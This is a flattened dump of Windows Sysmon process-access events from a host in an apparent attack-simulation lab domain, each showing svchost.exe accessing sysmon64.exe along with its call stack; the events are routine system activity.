10341000x80000000000000001527Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.322{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001526Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.322{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001525Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.322{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001524Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.322{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001523Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.322{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001522Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.322{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001521Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.322{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001520Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.322{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001519Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.306{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001518Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.306{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001517Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.306{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001516Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.306{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001515Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.306{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001514Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.306{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001513Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.306{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001512Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.306{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001511Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.306{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001510Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.306{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001509Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.306{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001508Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.282{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001507Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.282{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001506Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.282{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001505Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.282{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001504Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.282{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001503Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 